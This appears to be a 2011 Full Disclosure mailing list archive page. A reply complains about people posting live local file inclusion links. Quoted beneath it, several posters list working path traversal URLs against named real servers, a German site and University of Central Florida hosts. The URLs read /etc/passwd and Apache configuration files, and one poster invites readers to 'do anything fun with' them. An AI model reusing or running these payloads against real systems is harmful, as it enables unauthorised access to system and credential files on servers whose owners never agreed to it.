|
Full Disclosure
mailing list archives
Re: LFI Bug and other
From: ghost <ghosts () gmail com>
Date: Sat, 19 Feb 2011 19:06:03 -0800
It sure as hell was not meant to be a place where children post links
to sites with live LFI issues.
On Sat, Feb 19, 2011 at 4:58 AM, Friedrich Hausberger
<fhausberger () gmail com> wrote:
Is full disclosure a security mailing list, where I can find hacking
stuff or a magazine about
chat show? I hate pornography also, but this is the wrong way to publish.
Here you have a LFI vuln I found by accident:
http://bc-heppenheim.de/download.php?datei=../../../../../etc/passwd.
Feel free to download the whole Debian 4.0 Distribution.
Most provider do not use jails/chroot or similar for their multi hosted
webserver. Nearly all providers are hackable under 3 days.
Regards
FHausberger
Message: 17
Date: Sat, 19 Feb 2011 01:08:56 -0500
From: Hack Talk<hacktalkblog () gmail com>
Subject: [Full-disclosure] University of Central Florida Multiple LFI
To: full-disclosure () lists grok org uk
Message-ID:
<AANLkTi=oyDpNL6Jgu8Ms=btLaZdjUkvyhFxXLH8vDjj0 () mail gmail com>
Content-Type: text/plain; charset="iso-8859-1"
Found these and thought I'd share:
-==================-
http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
-==================-
Let me know if you do anything fun with 'em
Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/6916c766/attachment-0001.html
------------------------------
Message: 18
Date: Sat, 19 Feb 2011 16:34:21 +0530
From: Madhur Ahuja<ahuja.madhur () gmail com>
Subject: Re: [Full-disclosure] University of Central Florida Multiple
LFI
To: Hack Talk<hacktalkblog () gmail com>
Cc: full-disclosure () lists grok org uk
Message-ID:
<AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=SM-K () mail gmail com>
Content-Type: text/plain; charset="utf-8"
http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog () gmail com> wrote:
Found these and thought I'd share:
-==================-
http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
-==================-
Let me know if you do anything fun with 'em
Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/d0ac46de/attachment.html
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 72, Issue 44
***********************************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
|
